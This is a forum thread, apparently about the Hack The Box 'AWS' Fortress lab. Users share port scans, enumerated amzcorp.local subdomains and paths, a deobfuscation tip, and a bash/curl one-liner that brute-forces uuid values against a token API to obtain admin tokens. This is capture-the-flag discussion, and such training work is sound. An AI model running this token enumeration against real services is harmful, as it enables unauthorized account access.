Return to forum
Fortresses_AWS
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 5
Threads: 0
Joined: N/A
Reputation: 0

#1
July 11, 2022 at 11:41 AM
Hello brudas,

New fortresses has been released on HTB named as AWS.

Lets discuss about it.

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
2179/tcp open  vmrdp
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
Reply
Banned
Posts: 32
Threads: 0
Joined: N/A
Reputation: 0

#2
July 12, 2022 at 2:59 AM
Found: jobs.amzcorp.local (Status: 503) [Size: 299]
Found: cloud.amzcorp.local (Status: 503) [Size: 299]
Found: inventory.amzcorp.local (Status: 503) [Size: 299]
Found: workflow.amzcorp.local (Status: 503) [Size: 299]
Reply
Elite User
Elite
Posts: 132
Threads: 0
Joined: N/A
Reputation: 5

#3
July 12, 2022 at 4:52 AM
Paths on workflow:
home[Status:302,
calendar[Status:302,
health[Status:200,
code[Status:302,
back[Status:302,
log[Status:302,
graph[Status:302,
tree[Status:302,
plugin[Status:302,
task[Status:302,
provider[Status:302,
configuration[Status:302,
redoc[Status:200,
confirm[Status:302,
trigger[Status:302,
tries[Status:302,

Paths on inventory:
home[Status:500,
logout[Status:500,
items[Status:500,
settings[Status:500,
po[Status:500,
delete[Status:500,
pay[Status:500,
otp[Status:405,
emails[Status:200,
Reply
Member
Member
Posts: 7
Threads: 0
Joined: N/A
Reputation: 0

#4
July 12, 2022 at 9:49 AM
(July 12, 2022, 02:59 AM)F4nny Wrote: Found: jobs.amzcorp.local (Status: 503) [Size: 299]
Found: cloud.amzcorp.local (Status: 503) [Size: 299]
Found: inventory.amzcorp.local (Status: 503) [Size: 299]
Found: workflow.amzcorp.local (Status: 503) [Size: 299]


I got different status code after the machine reset

jobs.amzcorp.local (Status: 302) [Size: 218]
cloud.amzcorp.local (Status: 403) [Size: 309]
inventory.amzcorp.local (Status: 200) [Size: 6675]
workflow.amzcorp.local (Status: 302) [Size: 217]
Reply
Hellfire
GOD
Posts: 104
Threads: 0
Joined: N/A
Reputation: 32

#5
July 12, 2022 at 5:11 PM
[code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code]
Reply
Member
Member
Posts: 17
Threads: 0
Joined: N/A
Reputation: 21

#6
July 12, 2022 at 6:22 PM
If anyone wonder, you find exploit place from deobfuscate app.js on http://jobs.amzcorp.local/static/assets/js/app.js
Reply
Member
Member
Posts: 4
Threads: 0
Joined: N/A
Reputation: 0

#7
July 12, 2022 at 7:06 PM
(July 12, 2022, 06:22 PM)paulwatson42016 Wrote: If anyone wonder, you find exploit place from deobfuscate app.js on http://jobs.amzcorp.local/static/assets/js/app.js


Been trying to deobfuscate that for hours. How did you do it?
Reply
Member
Member
Posts: 3
Threads: 0
Joined: N/A
Reputation: 0

#8
July 12, 2022 at 8:16 PM
(July 12, 2022, 07:06 PM)derek Wrote:
(July 12, 2022, 06:22 PM)paulwatson42016 Wrote: If anyone wonder, you find exploit place from deobfuscate app.js on http://jobs.amzcorp.local/static/assets/js/app.js


Been trying to deobfuscate that for hours. How did you do it?


https://lelinhtinh.github.io/de4js/
try this and click on auto decode
Reply
Elite User
Elite
Posts: 132
Threads: 0
Joined: N/A
Reputation: 5

#9
July 13, 2022 at 11:45 AM
How are we supposed to use the token ? Is it a cookie ? a loalStorage ?
Reply
Member
Member
Posts: 28
Threads: 0
Joined: N/A
Reputation: 1

#10
July 13, 2022 at 3:58 PM
(July 13, 2022, 11:45 AM)fironeDerbert Wrote: How are we supposed to use the token ? Is it a cookie ? a loalStorage ?


In cookies: api_token
Does anybody able to edit user?
Reply


 Users viewing this thread: Fortresses_AWS: No users currently viewing.